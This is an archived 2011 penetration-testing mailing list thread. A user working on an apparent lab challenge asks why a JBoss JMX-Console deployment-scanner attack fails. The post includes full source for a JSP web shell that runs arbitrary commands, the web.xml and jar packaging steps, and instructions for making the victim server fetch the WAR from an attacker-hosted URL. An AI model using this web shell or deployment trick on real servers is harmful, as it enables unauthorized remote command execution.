Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: breaking jboss with a browser? not happening

From: lazers <a.alii85 () gmail com>
Date: Fri, 21 Jan 2011 00:11:20 -0800 (PST)

yes i know about the different upload features of jboss and em currently
exploiting the use
of deployment scanners. Thank you for your help. 



Danux wrote:


Hint: check the upload features of Jboss. You can upload war files.
Sent via BlackBerry from Danux Network

-----Original Message-----
From: lazers <a.alii85 () gmail com>
Sender: listbounce () securityfocus com
Date: Fri, 14 Jan 2011 12:02:57 
To: <pen-test () securityfocus com>
Subject: breaking jboss with a browser? not happening


I have been given task to break into jboss application by my senior sec
manager at my company. 
Its a hacking challenge staged in a test lab This is what i have been
given.
A web-access to jboss.
Yes that pretty much it<3. He believes in less is more philosophy. With
some
get to start working info. I have been told that a vulnerability exists
inthe application and its no 0 day exploit its an known vulnerability.It
is
set as an open-book challenge i can get help anywhere i like. So what i
did
so for?


Yes i google ; but i also run a nessus scan and the scan brought me one
HIGH
vulnerability. Its has to do with the default Jboss installation using the
JMX-Console. Its not a new vulnerability i was able to reach this
conclusion
as i start googling. This particular vulnerability is very popular; I was
saying to myself that my problems are over and i would be break it into
jboss in record time. But that has been largely un-true. Why? Well if it
wasn't true i wouldn't be  here. I did the following (in steps) 
 

attack vector: deployment scanner feature

 

 

1.confirmed the default installation (by accessing localhost:9090) in my
case its

9090 not 8080 as in hacking literature. Probably this is because em using
a
new version (idk exact reason)

 

2.i wrote this jsp script(cmd.jsp) astold in sites.

<%@ page import="java.util.*,java.io.*"%>

<%

%>

<HTML><BODY>

Commands with JSP

<FORM METHOD="GET" NAME="myform"ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

out.println("Command: " + request.getParameter("cmd") +"<BR>");

Process p =Runtime.getRuntime().exec(request.getParameter("cmd"));

OutputStream os = p.getOutputStream();

InputStream in = p.getInputStream();

DataInputStream dis = new DataInputStream(in);

String disr = dis.readLine();

while ( disr != null ) {

out.println(disr);

disr = dis.readLine();

}

}

%>

</pre>

</BODY></HTML>

 

3.next i create a web.xml file to be placed in WEB-INF folder

 

<?xml version="1.0" ?>

<web-app xmlns="http://java.sun.com/xml/ns/j2ee";

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";

xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee

http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd";

version="2.4">

<servlet>

<servlet-name>Command</servlet-name>

<jsp-file>/cmd.jsp</jsp-file>

</servlet>

</web-app>

 

4.I complied the file cmd.jsp by placing the web.xml file in WEB-INF
folder

 

jar cvf cmd.war WEB-INF cmd.jsp

 

5. I put this file in http-apache server. File cmd.war reside at htdocs
folder. Can be accessed by url: mywebserver:80/cmd.war

 

6.i go back to jboss defualt page and navigate myself to
jboss.deploymentpage.

 

7. in the addurl tab i enter path for my cmd.war file as

http://mywebserver/cmd.war

 

8. next i goto victim webserver in attempt to access my uploaded
application
http://victim:9090/cmd/cmd.jsp

 

9. i get HTTP STATUS 404- /cmd/cmd.jsp

 

my app is suppose to be hot deployed by the jboss; but this is not the
case
coz even after 10-20 times after u have access the file i get the same
error
page. I want to know what is the reason for the behavior. I know there
exists other attack vector (e.g rmi and etc) but i want to stick to this
until i don't figure out the reason for this failure of exploit.

 

Em i compiling the .jsp file with incorrect syntax? do i need to have
tomcat
server installed instead? I read it on internet that there could be some
problems in the jboss trying to get reverse shell on your web-server as
jboss is it work in bind-shell mode only? I'm really clueless to what i
happening i spent 12 works on this single attack vector but em not making
head-ways.

 

jboss gurus help me.

 

thanks
-- 
View this message in context:
http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30674976.html
Sent from the Penetration Testing mailing list archive at Nabble.com.


------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review
Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require a
full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------





-- 
View this message in context: 
http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30726534.html
Sent from the Penetration Testing mailing list archive at Nabble.com.


------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: